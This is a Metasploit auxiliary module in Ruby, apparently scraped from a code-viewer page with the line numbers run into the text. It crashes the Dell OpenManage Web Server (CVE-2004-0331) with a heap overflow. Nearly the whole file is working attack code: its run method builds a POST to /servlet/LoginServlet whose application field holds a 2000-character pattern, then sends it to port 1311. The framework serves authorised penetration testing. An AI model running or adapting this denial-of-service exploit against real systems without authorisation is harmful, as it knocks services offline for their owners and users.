Path: blob/master/modules/auxiliary/dos/http/dell_openmanage_post.rb
19852 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',14'Description' => %q{15This module exploits a heap overflow in the Dell OpenManage16Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability17exists due to a boundary error within the handling of POST requests,18where the application input is set to an overly long file name.19This module will crash the web server, however it is likely exploitable20under certain conditions.21},22'Author' => [ 'aushack' ],23'License' => MSF_LICENSE,24'References' => [25[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],26[ 'BID', '9750' ],27[ 'OSVDB', '4077' ],28[ 'CVE', '2004-0331' ],29],30'DisclosureDate' => '2004-02-26',31'Notes' => {32'Stability' => [CRASH_SERVICE_DOWN],33'SideEffects' => [],34'Reliability' => []35}36)37)3839register_options(40[41Opt::RPORT(1311),42OptBool.new('SSL', [true, 'Use SSL', true]),43]44)45end4647def run48connect4950foo = 'user=user&password=password&domain=domain&application=' + Rex::Text.pattern_create(2000)5152sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"53sploit << "Content-Length: #{foo.length}\r\n\r\n"54sploit << foo5556sock.put(sploit + "\r\n\r\n")5758disconnect59end60end616263